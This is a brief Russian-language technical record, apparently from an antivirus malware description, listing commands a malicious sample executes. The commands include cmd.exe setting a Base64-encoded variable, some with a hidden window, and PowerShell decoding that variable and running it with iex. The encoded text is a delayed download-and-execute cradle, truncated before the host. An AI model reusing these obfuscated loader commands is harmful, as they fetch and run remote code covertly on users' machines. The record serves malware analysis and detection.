Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop $x=[System.Convert]::FromBase64String($env:gg);$x=[System.Text.Encoding]::Unicode.GetString($x);iex $x
- '<SYSTEM32>\cmd.exe' /c set gg=UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA3ADkAOwBpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACg...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c set gg=UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA3ADkAOwBpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACg...